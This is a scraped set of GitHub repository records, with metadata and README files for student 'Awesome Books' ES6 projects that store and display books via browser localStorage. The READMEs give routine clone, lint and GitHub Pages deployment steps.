css,html,javascript,webpack
2023-05-03T08:43:47Z
2023-05-13T01:12:36Z
null
2
5
22
5
0
6
null
MIT
JavaScript
clin2on3mun/Awesome-booksEs6
main
<a name="readme-top"></a> <!-- HOW TO USE: This is an example of how you may give instructions on setting up your project locally. Modify this file to match your project and remove sections that don't apply. REQUIRED SECTIONS: - Table of Contents - About the Project - Built With - Live Demo - Getting Started - Authors - Future Features - Contributing - Show your support - Acknowledgements - License OPTIONAL SECTIONS: - FAQ After you're finished please remove all the comments and instructions! --> <div align="center"> <!-- You are encouraged to replace this logo with your own! Otherwise you can also remove it. --> <br/> <h3><b>AWESOME BOOKS WITH ES6</b></h3> </div> <!-- TABLE OF CONTENTS --> # 📗 Table of Contents - [📖 About the Project](#about-project) - [🛠 Built With](#built-with) - [Tech Stack](#tech-stack) - [Key Features](#key-features) - [🚀 Live Demo](#live-demo) - [💻 Getting Started](#getting-started) - [Setup](#setup) - [Prerequisites](#prerequisites) - [Install](#install) - [Usage](#usage) - [Run tests](#run-tests) - [Deployment](#deployment) - [👥 Authors](#authors) - [🔭 Future Features](#future-features) - [🤝 Contributing](#contributing) - [⭐️ Show your support](#support) - [🙏 Acknowledgements](#acknowledgements) - [📝 License](#license) <!-- PROJECT DESCRIPTION --> # 📖 [Awesome Books ES6] <a name="about-project"></a> **[Awesome Books with ES6]** is a project that uses ES6 syntax and modules to stores the book dynamically and view books stored in localStorage in browser on UI. ## 🛠 Built With <a name="built-with">HTML,CSS & Javascript</a> ### Tech Stack <a name="tech-stack"></a> <details> <summary>Client</summary> <ul> <li><a href="">HTML,CSS & JAVASCRIPT</a></li> </ul> </details> <!-- Features --> ### Key Features <a name="key-features"></a> - **[Display books on UI]** -**[using ES6 syntax]** - **[Store books in LocalStorage]** - **[Remove books on UI and LocalStorage]** <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- LIVE DEMO --> ## 🚀 Live Demo <a name="live-demo"></a> - [Live Demo Link]( https://clin2on3mun.github.io/Awesome-booksEs6/) <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- GETTING STARTED --> ## 💻 Getting Started <a name="getting-started"></a> To get a local copy up and running, follow these steps. ### Prerequisites In order to run this project you need: - A browser of you choice. - A text editor of your choice. - An installed node.js on your local system ### Setup Clone this repository to your desired folder: cd my-folder git clone git@github.com:clin2on3mun/Awesome-booksEs6.git ### Install Install this project with: -you can download it as a zipped file -you can clone it using OS terminal or code editor terminal- ### Usage To run the project, execute the following command: -Run the index.html with your preferred browser. ### Deployment You can deploy this project using: You can deploy this project using: - Free deployment services like GitHub pages. - Any deployment services of your choice. <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- AUTHORS --> ## 👥 Authors <a name="authors"></a> 👤 **Munana Clinton** - GitHub: [@githubhandle](https://github.com/clin2on3mun) - Twitter: [@twitterhandle](https://twitter.com/ClintonMunana) - LinkedIn: [LinkedIn](https://www.linkedin.com/in/munana-clinton-b6122720b/) <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- FUTURE FEATURES --> ## 🔭 Future Features <a name="future-features"></a> - [ ] **[style the UI to look better]** <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- CONTRIBUTING --> ## 🤝 Contributing <a name="contributing"></a> Contributions, issues, and feature requests are welcome! Feel free to check the [issues page](../../issues/). <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- SUPPORT --> ## ⭐️ Show your support <a name="support"></a> If you like this project you can recommend to your friend, family and colleagues who want to use my services <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- ACKNOWLEDGEMENTS --> ## 🙏 Acknowledgments <a name="acknowledgements"></a> **I would like to thank microverse for guiding and providing with all great material to do my projects and thank my coding partners who helped** <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- FAQ (optional) --> <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- LICENSE --> ## 📝 License <a name="license"></a> This project is [MIT](./LICENSE.md) licensed. <p align="right">(<a href="#readme-top">back to top</a>)</p>
A website that lets you store and retrieve a book or books. Made using JavaScript localstorage.
css,html,javascript
2023-05-01T06:05:58Z
2023-05-01T20:38:00Z
null
1
1
9
1
0
6
null
MIT
JavaScript
Sonikak004/ES6-Awesome_Books
main
<a name="readme-top"></a> <div align="center"> <h1><b>Awesome Books</b></h1> </div> <!-- TABLE OF CONTENTS --> # 📗 Table of Contents - [📖 About the Project](#about-project) - [🛠 Built With](#built-with) - [Tech Stack](#tech-stack) - [Key Features](#key-features) - [🚀 Live Demo](#live-demo) - [💻 Getting Started](#getting-started) - [Setup](#setup) - [Prerequisites](#prerequisites) - [Install](#install) - [Usage](#usage) - [Run tests](#run-tests) - [Deployment](#triangular_flag_on_post-deployment) - [👥 Authors](#authors) - [🔭 Future Features](#future-features) - [🤝 Contributing](#contributing) - [⭐️ Show your support](#support) - [🙏 Acknowledgements](#acknowledgements) - [📝 License](#license) <!-- PROJECT DESCRIPTION --> # 📖 Awesome books <a name="about-project"></a> > it a basic book collection app,and learning more about javascript object and class ## 🛠 Built With <a name="built-with"></a> ### Tech Stack <a name="tech-stack"></a> - HTML-5 - CSS3 - Java Script - Linters - Bootsrap 5 - ES6 <details> <summary>Client</summary> <ul> <li><a href="https://github.com/techmoves/my-portfolio/blob/htmlcss1/.github/workflows/linters.yml">Linters</a></li> <li><a href="https://www.w3schools.com/html/">HTML</a></li> <li><a href="https://www.w3schools.com/css/">CSS</a></li> </ul> </details> <p align="right">(<a href="#readme-top">back to top</a>)</p> <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- GETTING STARTED --> ## 💻 Getting Started <a name="getting-started"></a> - To get a local copy up and running, follow these steps. ### Prerequisites - You only need a browser to run the html file in. - A web browser: You will need a modern web browser such as Google Chrome, Mozilla Firefox, or Safari to view and test your project. A code editor: You will need a code editor such as Visual Studio Code, Sublime Text, or Atom to write, edit, and manage your project's files. A local server: You will need a local server such as XAMPP or WAMP to run your project locally and test it on your own computer. Knowledge of HTML, CSS, and JavaScript: You will need to have a basic understanding of HTML, CSS, and JavaScript in order to build a web development project. Familiarity with Git and GitHub: If you are using Git and GitHub to manage your project's codebase, you will need to be familiar with how to use them. ### Setup - Create a new folder to store the files in. - Open a command-line interface (e.g. Terminal on Mac or Linux, Command Prompt on Windows). Navigate to the folder where you want to clone the repository using the cd command. Use the git clone command followed by the repository's URL to clone the repository. For example: git clone https://github.com/techmoves/Awesome-books.git Press enter and wait for the repository to finish cloning. ### Install Install this project with: - Open your command prompt or terminal and run. - git clone [https://github.com/techmoves/Awesome-books.git] - Clone the repository to your local machine using the git clone command as described in the previous answer. Navigate to the project folder using a command-line interface such as Terminal or Command Prompt. Install any necessary dependencies using a package manager such as NPM or Yarn. You can do this by running the npm install or yarn install command in the project folder. Start the local server using a command such as npm start or yarn start, depending on the project's setup. Open a web browser and navigate to the local server's URL to view and test the project. - ### Usage - Assuming that you have installed the project's dependencies and started the local server, you can run the project by following these steps: Open a web browser such as Google Chrome, Mozilla Firefox, or Safari. In the address bar, type the URL of the local server that you started in the previous step. This will typically be something like http://localhost:3000. Press enter to navigate to the local server's URL. The project should now be running in your web browser. Use the website's interface to interact with the project and test its functionality. ### Run tests To run tests, run the following command: - To run tests run : - npx hint . - npx stylelint "\*_/_.{css,scss}" ### Deployment - Project is deployed using [GitHub Pages](https://github.com/Sonikak004/ES6-Awesome_Books.git) <!-- AUTHORS --> ## 👥 Authors <a name="authors"></a> 👤 **Sonika Kumar** - GitHub: [sonikak004](https://github.com/sonikak004) - Twitter: [@sonikak004](https://twitter.com/sonikak004) - LinkedIn: [LinkedIn](https://www.linkedin.com/in/sonikak004/) <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- FUTURE FEATURES --> ## 🔭 Future Features <a name="future-features"></a> > Features to be added: - [X] **[booklist in collection]** <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- CONTRIBUTING --> ## 🤝 Contributing <a name="contributing"></a> Understand the project's goals: Before I start contributing to a project, it's important to understand its goals, scope, and target audience. Read the project's documentation and review its codebase to get a sense of what it does and how it works. Create a new issue: If you I find an existing issue that matches your contribution, consider creating a new one. sure about the problem or feature request clearly and provide any relevant details or context. Contributions, issues, and feature requests are welcome! Feel free to check the [issues page](https://github.com/Sonikak004/ES6-Awesome_Books.git) <p align="right">(<a href="https://github.com/Sonikak004/ES6-Awesome_Books.git">back to top</a>)</p> <!-- SUPPORT --> ## ⭐️ Show your support <a name="support"></a> Give a ⭐️ if you like this project! (back to top) <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- ACKNOWLEDGEMENTS --> ## 🙏 Acknowledgments <a name="acknowledgements"></a> I thank microverse and my coding partner who inspired me to make this project! <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- LICENSE --> ## 📝 License <a name="license"></a> This project is [MIT](./mit.md) licensed. <p align="right">(<a href="#readme-top">back to top</a>)</p>
Manage your book collection effortlessly with the Awesome Books app. Add, delete, and explore books with author names and titles in this JavaScript-powered SPA.
css,html5,javascript,luxon,modules
2023-05-08T10:16:45Z
2023-06-22T14:36:18Z
null
1
1
24
0
0
5
null
null
JavaScript